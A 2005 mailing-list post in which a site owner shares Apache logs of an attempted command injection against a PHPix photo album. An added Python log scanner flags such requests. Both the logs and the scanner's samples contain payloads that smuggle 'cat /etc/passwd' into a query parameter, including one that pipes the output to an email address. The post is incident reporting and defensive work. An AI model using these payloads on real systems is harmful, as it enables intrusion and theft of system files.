From: LT-P <LT...@LT...> - 2005-01-28 21:18:09
Looking into my Apache logs, I found this:

___
ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:06 +0100] "GET /albums/?mode=album&album=Divers&dispsize=800&start=0 HTTP/1.1" 200 5348 "http://www.google.de/search?hl=de&q=intext%3AGenerated.by.PHPix+2.0.3%3F+inurl%3A%24mode%3Dalbum&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:07 +0100] "GET /albums/style.css HTTP/1.1" 200 2137 "http://83.192.28.223/albums/?mode=album&album=Divers&dispsize=800&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:09 +0100] "GET /albums/showpic.php?album=Divers&dispsize=100&user=&pic=DSC00039.JPG&width=75&height=100&mode=album HTTP/1.1" 200 7562 "http://83.192.28.223/albums/?mode=album&album=Divers&dispsize=800&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:10 +0100] "GET /CSS/ltpnet-black.css HTTP/1.1" 200 4999 "http://83.192.28.223/albums/?mode=album&album=Divers&dispsize=800&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:11 +0100] "GET /albums/showpic.php?album=Divers&dispsize=100&user=&pic=DSC00040.JPG&width=75&height=100&mode=album HTTP/1.1" 200 7859 "http://83.192.28.223/albums/?mode=album&album=Divers&dispsize=800&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:12 +0100] "GET /albums/blank.gif HTTP/1.1" 200 43 "http://83.192.28.223/albums/?mode=album&album=Divers&dispsize=800&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:13 +0100] "GET /albums/showpic.php?album=Divers&dispsize=100&user=&pic=DSC00041.JPG&width=100&height=75&mode=album HTTP/1.1" 200 7978 "http://83.192.28.223/albums/?mode=album&album=Divers&dispsize=800&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:20 +0100] "GET /albums/?mode=album&album=Divers&pic=`cat%20/etc/passwd`&dispsize=640&start=0 HTTP/1.1" 200 5480 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:49 +0100] "GET /albums/?mode=album&album=Divers&pic=`cat%20/etc/passwd%20|%20mail%20w...@gm...`&dispsize=640&start=0 HTTP/1.1" 200 5517 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
___

The email (win...@gm...) is a real one, with a person answering.

I checked the executed PHPix code used during this attack and did some tests. It /seems/ to be ok, the PHPix engine is (probably?) safe on this point. But I think it could be a Good Idea to review the entire code and to look for potential abuse possibilities.

Regards,
LT-P
--
Seals are cute, kiss them
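
The two signals visible in the log above (a search-engine dork in the Referer, then shell metacharacters in a query parameter) can be pulled out of an access log automatically. The following is an added example, not part of the original post or of PHPix; the host names, the mail address and the shortened user agent in the sample lines are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Shell metacharacters that have no place in an album or picture name.
SHELL_META = re.compile(r'`|\$\(|[|;&<>]')
# Search operators in a referring search query suggest the site was found by a dork.
DORK = re.compile(r'\b(?:intext|inurl|intitle):', re.I)

def suspicious_params(target):
    """Return [(name, decoded_value)] for query parameters holding shell metacharacters."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if SHELL_META.search(v)]

def scan(lines):
    """Return one finding per log line with a dork referer or an injection attempt."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not in combined format; skipped rather than guessed at
        params = suspicious_params(m['target'])
        dork = bool(DORK.search(unquote_plus(m['referer'])))
        if params or dork:
            findings.append({'host': m['host'], 'time': m['time'],
                             'status': int(m['status']),
                             'dork_referer': dork, 'params': params})
    return findings

UA = 'Mozilla/4.0 (compatible; MSIE 6.0)'  # shortened, constructed
# Constructed sample lines modelled on the log in the post.
SAMPLE = [
    'client.example.net - - [28/Jan/2005:21:24:06 +0100] "GET /albums/?mode=album&album=Divers&dispsize=800&start=0 HTTP/1.1" 200 5348 "http://www.google.de/search?hl=de&q=intext%3AGenerated.by.PHPix+2.0.3%3F+inurl%3A%24mode%3Dalbum&meta=" "' + UA + '"',
    'client.example.net - - [28/Jan/2005:21:24:07 +0100] "GET /albums/style.css HTTP/1.1" 200 2137 "http://photos.example.org/albums/?mode=album&album=Divers&dispsize=800&start=0" "' + UA + '"',
    'client.example.net - - [28/Jan/2005:21:24:20 +0100] "GET /albums/?mode=album&album=Divers&pic=`cat%20/etc/passwd`&dispsize=640&start=0 HTTP/1.1" 200 5480 "-" "' + UA + '"',
    'client.example.net - - [28/Jan/2005:21:24:49 +0100] "GET /albums/?mode=album&album=Divers&pic=`cat%20/etc/passwd%20|%20mail%20user@example.invalid`&dispsize=640&start=0 HTTP/1.1" 200 5517 "-" "' + UA + '"',
]

if __name__ == '__main__':
    for f in scan(SAMPLE):
        print(f)
```

A 200 status on a flagged request only shows that the page was served; whether the parameter ever reached a shell has to be established from the application code.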